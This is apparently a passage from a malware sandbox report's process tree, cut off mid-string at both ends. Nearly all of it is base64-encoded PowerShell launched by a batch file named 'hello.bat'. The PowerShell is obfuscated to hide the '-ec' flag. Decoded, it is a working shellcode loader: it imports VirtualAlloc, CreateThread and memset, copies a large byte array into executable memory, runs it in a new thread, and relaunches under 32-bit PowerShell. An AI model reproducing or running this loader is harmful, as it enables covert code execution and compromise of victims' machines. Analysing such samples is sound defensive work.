HgAMgAzACwAMAB4ADEANAAsADAAeAA4ADIALAAwAHgAYwBmACwAMAB4ADUAYwAsADAAeAA5AGMALAAwAHgANgA3ACwAMAB4AGYAZQAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4AGUAYwAsADAAeAA1ADMALAAwAHgANQBmACwAMAB4ADgAOAAsADAAeABhADAALAAwAHgANQBmACwAMAB4ADEANAAsADAAeABkAGMALAAwAHgANQAwACwAMAB4AGUAYgAsADAAeAA1ADgALAAwAHgAYwA5ACwAMAB4ADYAOQAsADAAeAAxADQALAAwAHgAOQAzACwAMAB4AGIAZQAsADAAeABjADMALAAwAHgAYwBjACwAMAB4ADkAZAAsADAAeAAwADAALAAwAHgANwBmACwAMAB4ADIAYwAsADAAeABiAGYALAAwAHgAZgBjACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgAMQBmACwAMAB4ADMAYwAsADAAeAA0AGUALAAwAHgANwA0ACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMQA5ACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAZAA3ACwAMAB4ADEAMgAsADAAeABhAGUALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA2ADYALAAwAHgANwAzACwAMAB4ADYAMQAsADAAeABiADMALAAwAHgAMwAxACwAMAB4ADAAMAAsADAAeAAyADEALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABkADYALAAwAHgAZAA2ACwAMAB4AGUANwAsADAAeAA0ADMALAAwAHgAMAA3ACwAMAB4ADkAZAAsADAAeABhADAALAAwAHgANgAzACwAMAB4AGYANwAsADAAeAAyADkALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmADYALAAwAHgAZgBlACwAMAB4ADEAYwAsADAAeABiADIALAAwAHgAOABjACwAMAB4ADMAYwAsADAAeAAyAGUALAAwAHgAYgBiACwAMAB4ADIANAAsADAAeABiADYALAAwAHgANgA0ACwAMAB4AGMAOAAsADAAeABiADYALAAwAHgAMQBlACwAMAB4AGIANQAsADAAeAAwAGUALAAwAHgANwA5ACwAMAB4ADUAMQAsADAAeABiAGIALAAwAHgAMgAyACwAMAB4ADcAYgAsADAAeABhADkALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAAwADkALAAwAHgAYwAxACwAMAB4AGYAZQAsADAAeAA2ADcALAAwAHgAMABhACwAMAB4ADEAMgAsADAAeAA3AGMALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAMgA2ACwAMAB4ADMAMAAsADAAeAAwADcALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAA5ADUALAAwAHgAZABlACwAMAB4AGUAMQAsADAAeABkADQALAAwAHgANQAyACwAMAB4ADkANAAsADAAeABhAGUALAAwAHgAZgA4ACwAMAB4ADYANQAsADAAeAA3ADkALAAwAHgAYwA1ACwAMAB4ADAANQAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADAAYQAsADAAeAA4AGMALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgAZAA0ACwAMAB4ADYAZgAsADAAeABjADIALAAwAHgAOQA3ACwAMAB4AGIAMAAsADAAeABkAGUALAAwAHgAZgBiACwAMAB4AGMAOAAsADAAeAAxAGQALAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA4ADIALAAwAHgAOABjACwAMAB4AGQANgAsADAAeABkAGUALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeABkADcALAAwAHgAOAAyACwAMAB4AGYAYgAsADAAeAA4ADMALAAwAHgAMQA1ACwAMAB4ADMAZAAsADAAeABmAGMALAAwAHgAOABiACwAMAB4ADIAZQAsADAAeAA0AGUALAAwAHgAYwBlACwAMAB4ADEANAAsADAAeAA4ADQALAAwAHgAZAA4ACwAMAB4ADYAMgAsADAAeABkAGMALAAwAHgAMAAyACwAMAB4ADEAZQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4AGIANQAsADAAeABmADAALAAwAHgAYgBjACwAMAB4ADkAYgAsADAAeAA0ADgALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABiADIALAAwAHgAOABlACwAMAB4AGEANQAsADAAeABlAGMALAAwAHgAYQBjACwAMAB4ADIANwAsADAAeABjADYALAAwAHgANgA2ACwAMAB4ADIAZAAsADAAeABjADgALAAwAHgAMQAzACwAMAB4ADEAMgAsADAAeAAyADcALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADEAZQAsADAAeAAzADQALAAwAHgAOABlACwAMAB4ADkAMAAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADAANwAsADAAeAA3ADYALAAwAHgANwAyACwAMAB4AGQAMQAsADAAeAA0ADgALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA4ADEALAAwAHgAMgA4ACwAMAB4ADkANwAsADAAeABkAGEALAAwAHgAYwBiACwAMAB4AGEANgAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGYAMwAsADAAeAA2AGMALAAwAHgANgAxACwAMAB4ADkAMAAsADAAeAAxAGIALAAwAHgAZAA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAOAA1ACwAMAB4ADQAMAAsADAAeAA5ADEALAAwAHgAYQBkACwAMAB4ADQAYQAsADAAeAA1AGYALAAwAHgAZABmACwAMAB4AGUAZAAsADAAeABjADEALAAwAHgANgBjACwAMAB4ADEAZgAsADAAeABhADMALAAwAHgAMgAxACwAMAB4ADEAOAAsADAAeAAzADMALAAwAHgANQAzACwAMAB4AGMAMgAsADAAeAA1ADcALAAwAHgANgA5ACwAMAB4AGYANQAsADAAeABkAGQALAAwAHgANABkACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANABiACwAMAB4ADYAYQAsADAAeAA4AGYALAAwAHgAYQBlACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4ADkAOAAsADAAeABhAGIALAAwAHgAOABiACwAMAB4AGQAZAAsADAAeAA5ADMALAAwAHgANgAyACwAMAB4ADEAZQAsADAAeAA5AGUALAAwAHgAYwBiACwAMAB4ADgAYQAsADAAeABjAGUALAAwAHgAMQBlACwAMAB4ADAAYgAsADAAeABkAGQALAAwAHgAOAA0ACwAMAB4ADEAZQAsADAAeAA2ADMALAAwAHgAYgA5ACwAMAB4AGYAYwAsADAAeAA0AGMALAAwAHgAOQA2ACwAMAB4AGMANgAsADAAeAAyADgALAAwAHgAZQAxACwAMAB4ADAAYgAsADAAeAA1ADMALAAwAHgAZAAzACwAMAB4ADUAMAAsADAAeABmADgALAAwAHgAZgA0ACwAMAB4AGIAYgAsADAAeAA1AGUALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA2ADQALAAwAHgAYQAwACwAMAB4ADAAMgAsADAAeABjADIALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeAA0AGIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFUAZgBtAHkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAZgBtAHkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAZgBtAHkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABGAFEAcwApACkAOwAkAHIAUQB5AGIAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAbgBpAHUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAbgBpAHUAIAAkAHIAUQB5AGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcgBRAHkAYgAgACQAZQAiADsAfQA=
3⤵
PID:6404

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABZAGYAQQBqACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAWQBmAEEAagAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGUALAAwAHgAMQAzACwAMAB4AGQAOAAsADAAeABjAGEALAAwAHgAMQBlACwAMAB4AGQAYgAsADAAeABjAGYALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAYgAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMwAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAMwAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADYAMAAsADAAeABkADYALAAwAHgAMgA4ACwAMAB4AGUAYgAsADAAeAA3AGEALAAwAHgAMABlACwAMAB4ADIAMwAsADAAeAAxADQALAAwAHgAOAAyACwAMAB4AGMAZgAsADAAeAA1AGMALAAwAHgAOQBjACwAMAB4ADYANwAsADAAeABmAGUALAAwAHgANABlACwAMAB4AGYAYQAsADAAeABlAGMALAAwAHgANQAzACwAMAB4ADUAZgAsADAAeAA4ADgALAAwAHgAYQAwACwAMAB4ADUAZgAsADAAeAAxADQALAAwAHgAZABjACwAMAB4ADUAMAAsADAAeABlAGIALAAwAHgANQA4ACwAMAB4AGMAOQAsADAAeAA2ADkALAAwAHgAMQA0ACwAMAB4ADkAMwAsADAAeABiAGUALAAwAHgAYwAzACwAMAB4AGMAYwAsADAAeAA5AGQALAAwAHgAMAAwACwAMAB4ADcAZgAsADAAeAAyAGMALAAwAHgAYgBmACwAMAB4AGYAYwAsADAAeAA3AGQALAAwAHgANgAxACwAMAB4ADEAZgAsADAAeAAzAGMALAAwAHgANABlACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABmADIALAAwAHgAOABmACwAMAB4AGQANwAsADAAeAAxADIALAAwAHgAYQBlACwAMAB4ADUAZgAsADAAeAA1ADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeAA2ADEALAAwAHgAYgAzACwAMAB4ADMAMQAsADAAeAAwADAALAAwAHgAMgAxACwAMAB4ADQAYgAsADAAeAAzADgALAAwAHgAZAA2ACwAMAB4AGQANgAsADAAeABlADcALAAwAHgANAAzACwAMAB4ADAANwAsADAAeAA5AGQALAAwAHgAYQAwACwAMAB4ADYAMwAsADAAeABmADcALAAwAHgAMgA5ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgA2ACwAMAB4AGYAZQAsADAAeAAxAGMALAAwAHgAYgAyACwAMAB4ADgAYwAsADAAeAAzAGMALAAwAHgAMgBlACwAMAB4AGIAYgAsADAAeAAyADQALAAwAHgAYgA2ACwAMAB4ADYANAAsADAAeABjADgALAAwAHgAYgA2ACwAMAB4ADEAZQAsADAAeABiADUALAAwAHgAMABlACwAMAB4ADcAOQAsADAAeAA1ADEALAAwAHgAYgBiACwAMAB4ADIAMgAsADAAeAA3AGIALAAwAHgAYQA5ACwAMAB4AGYAYwAsADAAeABkAGEALAAwAHgAMAA5ACwAMAB4AGMAMQAsADAAeABmAGUALAAwAHgANgA3ACwAMAB4ADAAYQAsADAAeAAxADIALAAwAHgANwBjACwAMAB4AGIAMwAsADAAeAA5AGYALAAwAHgAOAA1ACwAMAB4ADIANgAsADAAeAAzADAALAAwAHgAMAA3ACwAMAB4ADYAMgAsADAAeABkADYALAAwAHgAOQA1ACwAMAB4AGQAZQAsADAAeABlADEALAAwAHgAZAA0ACwAMAB4ADUAMgAsADAAeAA5ADQALAAwAHgAYQBlACwAMAB4AGYAOAAsADAAeAA2ADUALAAwAHgANwA5ACwAMAB4AGMANQAsADAAeAAwADUALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAAwAGEALAAwAHgAOABjACwAMAB4AGIANAAsADAAeAA1AGEALAAwAHgAOABlACwAMAB4AGQANAAsADAAeAA2AGYALAAwAHgAYwAyACwAMAB4ADkANwAsADAAeABiADAALAAwAHgAZABlACwAMAB4AGYAYgAsADAAeABjADgALAAwAHgAMQBkACwAMAB4AGIAZgAsADAAeAA1ADkALAAwAHgAOAAyACwAMAB4ADgAYwAsADAAeABkADYALAAwAHgAZABlACwAMAB4ADYAYgAsADAAeAA0AGYALAAwAHgAZAA3ACwAMAB4ADgAMgAsADAAeABmAGIALAAwAHgAOAAzACwAMAB4ADEANQAsADAAeAAzAGQALAAwAHgAZgBjACwAMAB4ADgAYgAsADAAeAAyAGUALAAwAHgANABlACwAMAB4AGMAZQAsADAAeAAxADQALAAwAHgAOAA0ACwAMAB4AGQAOAAsADAAeAA2ADIALAAwAHgAZABjACwAMAB4ADAAMgAsADAAeAAxAGUALAAwAHgAZgAyACwAMAB4AGMAYQAsADAAeABiADUALAAwAHgAZgAwACwAMAB4AGIAYwAsADAAeAA5AGIALAAwAHgANAA4ACwAMAB4AGYAMQAsADAAeABiAGMALAAwAHgAYgAyACwAMAB4ADgAZQAsADAAeABhADUALAAwAHgAZQBjACwAMAB4AGEAYwAsADAAeAAyADcALAAwAHgAYwA2ACwAMAB4ADYANgAsADAAeAAyAGQALAAwAHgAYwA4ACwAMAB4ADEAMwAsADAAeAAxADIALAAwAHgAMgA3ACwAMAB4ADUAZQAsADAAeAA1AGMALAAwAHgANABiACwAMAB4ADYAZgAsADAAeAAxAGUALAAwAHgAMwA0ACwAMAB4ADgAZQAsADAAeAA5ADAALAAwAHgAMQBhACwAMAB4ADcAOQAsADAAeAAwADcALAAwAHgANwA2ACwAMAB4ADcAMgAsADAAeABkADEALAAwAHgANAA4ACwAMAB4ADIANwAsADAAeAAzADIALAAwAHgAOAAxACwAMAB4ADIAOAAsADAAeAA5ADcALAAwAHgAZABhACwAMAB4AGMAYgAsADAAeABhADYALAAwAHgAYwA4ACwAMAB4AGYAYQAsADAAeABmADMALAAwAHgANgBjACwAMAB4ADYAMQAsADAAeAA5ADAALAAwAHgAMQBiACwAMAB4AGQAOQAsADAAeABkADkALAAwAHgAMABjACwAMAB4ADgANQAsADAAeAA0ADAALAAwAHgAOQAxACwAMAB4AGEAZAAsADAAeAA0AGEALAAwAHgANQBmACwAMAB4AGQAZgAsADAAeABlAGQALAAwAHgAYwAxACwAMAB4ADYAYwAsADAAeAAxAGYALAAwAHgAYQAzACwAMAB4ADIAMQAsADAAeAAxADgALAAwAHgAMwAzACwAMAB4ADUAMwAsADAAeABjADIALAAwAHgANQA3ACwAMAB4ADYAOQAsADAAeABmADUALAAwAHgAZABkACwAMAB4ADQAZAAsADAAeAAwADQALAAwAHgAZgA5ACwAMAB4ADQAYgAsADAAeAA2AGEALAAwAHgAOABmACwAMAB4AGEAZQAsADAAeABlADMALAAwAHgANwAwACwAMAB4AGYANgAsADAAeAA5ADgALAAwAHgAYQBiACwAMAB4ADgAYgAsADAAeABkAGQALAAwAHgAOQAzACwAMAB4ADYAMgAsADAAeAAxAGUALAAwAHgAOQBlACwAMAB4AGMAYgAsADAAeAA4AGEALAAwAHgAYwBlACwAMAB4ADEAZQAsADAAeAAwAGIALAAwAHgAZABkACwAMAB4ADgANAAsADAAeAAxAGUALAAwAHgANgAzACwAMAB4AGIAOQAsADAAeABmAGMALAAwAHgANABjACwAMAB4ADkANgAsADAAeABjADYALAAwAHgAMgA4ACwAMAB4AGUAMQAsADAAeAAwAGIALAAwAHgANQAzACwAMAB4AGQAMwAsADAAeAA1ADAALAAwAHgAZgA4ACwAMAB4AGYANAAsADAAeABiAGIALAAwAHgANQBlACwAMAB4ADIANwAsADAAeAAzADIALAAwAHgANgA0ACwAMAB4AGEAMAAsADAAeAAwADIALAAwAHgAYwAyACwAMAB4ADUAOAAsADAAeAA3ADcALAAwAHgANgBhACwAMAB4AGIAMAAsADAAeABiADAALAAwAHgANABiADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABVAGYAbQB5AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABVAGYAbQB5AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABVAGYAbQB5ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
4⤵
PID:6604

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ealvc12u\ealvc12u.cmdline"
5⤵
PID:6512

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD7D5.tmp" "c:\Users\Admin\AppData\Local\Temp\ealvc12u\CSCCE38541664843128AB5AFC0A86A9E3B.TMP"
6⤵
PID:7920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\hello.bat" "
1⤵
PID:8248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 -C "sv lI -;sv mJz ec;sv qgU ((gv lI).value.toString()+(gv mJz).value.toString());powershell (gv qgU).value.toString() 'JABGAFEAcwAgAD0AIAAnACQAWQBmAEEAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABZAGYAQQBqACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADMALAAwAHgAZAA4ACwAMAB4AGMAYQAsADAAeAAxAGUALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBiACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAzACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgANgAwACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgAZQBiACwAMAB4ADcAYQAsADAAeAAwAGUALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeAA4ADIALAAwAHgAYwBmACwAMAB4ADUAYwAsADAAeAA5AGMALAAwAHgANgA3ACwAMAB4AGYAZQAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4AGUAYwAsADAAeAA1ADMALAAwAHgANQBmACwAMAB4ADgAOAAsADAAeABhADAALAAwAHgANQBmACwAMAB4ADEANAAsADAAeABkAGMALAAwAHgANQAwACwAMAB4AGUAYgAsADAAeAA1ADgALAAwAHgAYwA5ACwAMAB4ADYAOQAsADAAeAAxADQALAAwAHgAOQAzACwAMAB4AGIAZQAsADAAeABjADMALAAwAHgAYwBjACwAMAB4ADkAZAAsADAAeAAwADAALAAwAHgANwBmACwAMAB4ADIAYwAsADAAeABiAGYALAAwAHgAZgBjACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgAMQBmACwAMAB4ADMAYwAsADAAeAA0AGUALAAwAHgANwA0ACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMQA5ACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAZAA3ACwAMAB4ADEAMgAsADAAeABhAGUALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA2ADYALAAwAHgANwAzACwAMAB4ADYAMQAsADAAeABiADMALAAwAHgAMwAxACwAMAB4ADAAMAAsADAAeAAyADEALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABkADYALAAwAHgAZAA2ACwAMAB4AGUANwAsADAAeAA0ADMALAAwAHgAMAA3ACwAMAB4ADkAZAAsADAAeABhADAALAAwAHgANgAzACwAMAB4AGYANwAsADAAeAAyADkALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmADYALAAwAHgAZgBlACwAMAB4ADEAYwAsADAAeABiADIALAAwAHgAOABjACwAMAB4ADMAYwAsADAAeAAyAGUALAAwAHgAYgBiACwAMAB4ADIANAAsADAAeABiADYALAAwAHgANgA0ACwAMAB4AGMAOAAsADAAeABiADYALAAwAHgAMQBlACwAMAB4AGIANQAsADAAeAAwAGUALAAwAHgANwA5ACwAMAB4ADUAMQAsADAAeABiAGIALAAwAHgAMgAyACwAMAB4ADcAYgAsADAAeABhADkALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAAwADkALAAwAHgAYwAxACwAMAB4AGYAZQAsADAAeAA2ADcALAAwAHgAMABhACwAMAB4ADEAMgAsADAAeAA3AGMALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAMgA2ACwAMAB4ADMAMAAsADAAeAAwADcALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAA5ADUALAAwAHgAZABlACwAMAB4AGUAMQAsADAAeABkADQALAAwAHgANQAyACwAMAB4ADkANAAsADAAeABhAGUALAAwAHgAZgA4ACwAMAB4ADYANQAsADAAeAA3ADkALAAwAHgAYwA1ACwAMAB4ADAANQAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADAAYQAsADAAeAA4AGMALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgAZAA0ACwAMAB4ADYAZgAsADAAeABjADIALAAwAHgAOQA3ACwAMAB4AGIAMAAsADAAeABkAGUALAAwAHgAZgBiACwAMAB4AGMAOAAsADAAeAAxAGQALAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA4ADIALAAwAHgAOABjACwAMAB4AGQANgAsADAAeABkAGUALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeABkADcALAAwAHgAOAAyACwAMAB4AGYAYgAsADAAeAA4ADMALAAwAHgAMQA1ACwAMAB4ADMAZAAsADAAeABmAGMALAAwAHgAOABiACwAMAB4ADIAZQAsADAAeAA0AGUALAAwAHgAYwBlACwAMAB4ADEANAAsADAAeAA4ADQALAAwAHgAZAA4ACwAMAB4ADYAMgAsADAAeABkAGMALAAwAHgAMAAyACwAMAB4ADEAZQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4AGIANQAsADAAeABmADAALAAwAHgAYgBjACwAMAB4ADkAYgAsADAAeA